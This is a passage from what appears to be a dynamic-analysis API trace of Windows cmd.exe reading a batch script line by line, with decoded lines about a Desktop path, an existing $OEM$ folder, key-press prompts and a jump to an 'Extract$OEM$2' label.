lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.204] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12259, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x2fe3 [0181.204] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%eline%\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%eline%\r\nist \"!_desktop_!\\\" (\r\n") returned 9 [0181.204] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.205] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2fe3 [0181.205] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.205] GetFileType (hFile=0x9c) returned 0x1 [0181.205] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x2fe3 [0181.205] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.205] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12312, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3018 [0181.205] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo Desktop location was not detected, aborting...\r\n", cbMultiByte=53, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo Desktop location was not detected, aborting...\r\n=====================================================================================\r\n") returned 53 [0181.205] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.205] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3018 [0181.205] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.205] GetFileType (hFile=0x9c) returned 0x1 [0181.205] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3018 [0181.205] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.205] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12372, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3054 [0181.205] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo _____________________________________________________\r\n", cbMultiByte=60, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo _____________________________________________________\r\n==============================================================================\r\n") returned 60 [0181.205] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.205] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3054 [0181.205] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.205] GetFileType (hFile=0x9c) returned 0x1 [0181.205] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3054 [0181.205] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.205] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x305b [0181.205] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n___________________________________________________\r\n") returned 7 [0181.206] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.206] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x305b [0181.206] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.206] GetFileType (hFile=0x9c) returned 0x1 [0181.206] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x305b [0181.206] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.206] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12433, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3091 [0181.206] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color %_Yellow% \"Press any key to go back...\"\r\n", cbMultiByte=54, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color %_Yellow% \"Press any key to go back...\"\r\n____\r\n") returned 54 [0181.207] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.207] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3091 [0181.207] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.207] GetFileType (hFile=0x9c) returned 0x1 [0181.207] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3091 [0181.207] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.207] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12445, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x309d [0181.207] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="pause >nul\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="pause >nul\r\n %_Yellow% \"Press any key to go back...\"\r\n") returned 12 [0181.207] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.207] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x309d [0181.207] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.207] GetFileType (hFile=0x9c) returned 0x1 [0181.207] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x309d [0181.207] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.207] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12458, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x30aa [0181.207] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto Extras\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto Extras\r\n%_Yellow% \"Press any key to go back...\"\r\n") returned 13 [0181.207] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.208] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30aa [0181.208] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.208] GetFileType (hFile=0x9c) returned 0x1 [0181.208] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30aa [0181.208] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.208] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12461, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x30ad [0181.208] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\no Extras\r\n") returned 3 [0181.208] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.208] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30ad [0181.208] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.208] GetFileType (hFile=0x9c) returned 0x1 [0181.208] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30ad [0181.208] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.209] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12463, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x30af [0181.209] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0181.209] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.209] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30af [0181.209] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.209] GetFileType (hFile=0x9c) returned 0x1 [0181.209] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30af [0181.209] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.209] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12496, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x30d0 [0181.209] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="if exist \"!_desktop_!\\$OEM$\\\" (\r\n", cbMultiByte=33, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="if exist \"!_desktop_!\\$OEM$\\\" (\r\n key to go back...\"\r\n") returned 33 [0181.209] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.209] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30d0 [0181.209] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.209] GetFileType (hFile=0x9c) returned 0x1 [0181.209] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30d0 [0181.209] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.209] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12505, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x30d9 [0181.209] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="%eline%\r\n", cbMultiByte=9, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="%eline%\r\n\"!_desktop_!\\$OEM$\\\" (\r\n") returned 9 [0181.209] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.209] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30d9 [0181.210] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.210] GetFileType (hFile=0x9c) returned 0x1 [0181.210] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x30d9 [0181.210] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.210] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12555, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x310b [0181.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo $OEM$ folder already exists on the Desktop.\r\n", cbMultiByte=50, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo $OEM$ folder already exists on the Desktop.\r\n.\"\r\n") returned 50 [0181.210] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.210] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x310b [0181.210] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.210] GetFileType (hFile=0x9c) returned 0x1 [0181.210] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x310b [0181.210] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.210] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12615, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3147 [0181.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo _____________________________________________________\r\n", cbMultiByte=60, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo _____________________________________________________\r\n") returned 60 [0181.210] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.210] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3147 [0181.210] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.210] GetFileType (hFile=0x9c) returned 0x1 [0181.210] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3147 [0181.210] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.210] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12622, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x314e [0181.210] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="echo:\r\n", cbMultiByte=7, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="echo:\r\n___________________________________________________\r\n") returned 7 [0181.211] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.211] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x314e [0181.211] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.211] GetFileType (hFile=0x9c) returned 0x1 [0181.211] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x314e [0181.211] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.211] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12676, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3184 [0181.211] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="call :_color %_Yellow% \"Press any key to go back...\"\r\n", cbMultiByte=54, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="call :_color %_Yellow% \"Press any key to go back...\"\r\n____\r\n") returned 54 [0181.211] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.211] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3184 [0181.211] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.211] GetFileType (hFile=0x9c) returned 0x1 [0181.211] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3184 [0181.211] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.211] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12688, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3190 [0181.211] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="pause >nul\r\n", cbMultiByte=12, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="pause >nul\r\n %_Yellow% \"Press any key to go back...\"\r\n") returned 12 [0181.211] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.211] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3190 [0181.211] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.211] GetFileType (hFile=0x9c) returned 0x1 [0181.211] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3190 [0181.212] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.212] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12701, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x319d [0181.212] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="goto Extras\r\n", cbMultiByte=13, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="goto Extras\r\n%_Yellow% \"Press any key to go back...\"\r\n") returned 13 [0181.212] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.212] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x319d [0181.212] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.212] GetFileType (hFile=0x9c) returned 0x1 [0181.212] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x319d [0181.212] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.212] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12704, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31a0 [0181.212] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=")\r\n", cbMultiByte=3, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=")\r\no Extras\r\n") returned 3 [0181.212] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.212] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31a0 [0181.212] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.212] GetFileType (hFile=0x9c) returned 0x1 [0181.212] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31a0 [0181.212] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.212] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12706, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31a2 [0181.212] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\n\n") returned 2 [0181.212] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.212] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31a2 [0181.212] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.212] GetFileType (hFile=0x9c) returned 0x1 [0181.212] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31a2 [0181.213] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.213] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12722, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31b2 [0181.213] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=":Extract$OEM$2\r\n", cbMultiByte=16, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr=":Extract$OEM$2\r\nellow% \"Press any key to go back...\"\r\n") returned 16 [0181.213] _wcsicmp (_String1="_color2", _String2="Extract$OEM$2") returned -6 [0181.213] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.213] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31b2 [0181.213] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.213] GetFileType (hFile=0x9c) returned 0x1 [0181.213] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31b2 [0181.213] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.213] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12724, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31b4 [0181.213] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="\r\n", cbMultiByte=2, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="\r\nxtract$OEM$2\r\n") returned 2 [0181.213] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.213] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31b4 [0181.213] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.213] GetFileType (hFile=0x9c) returned 0x1 [0181.213] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31b4 [0181.213] ReadFile (in: hFile=0x9c, lpBuffer=0x7ff7bd735b80, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x43f9efe180, lpOverlapped=0x0 | out: lpBuffer=0x7ff7bd735b80*, lpNumberOfBytesRead=0x43f9efe180*=0x200, lpOverlapped=0x0) returned 1 [0181.213] SetFilePointer (in: hFile=0x9c, lDistanceToMove=12729, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x31b9 [0181.213] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr="cls\r\n", cbMultiByte=5, lpWideCharStr=0x7ff7bd72d920, cchWideChar=512 | out: lpWideCharStr="cls\r\nact$OEM$2\r\n") returned 5 [0181.213] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.213] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x31b9 [0181.214] _get_osfhandle (_FileHandle=3) returned 0x9c [0181.214] GetFileType (hFile=0x9c) returned 0x1 [0181.214] SetFilePointer (in: hFile=0x9c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, 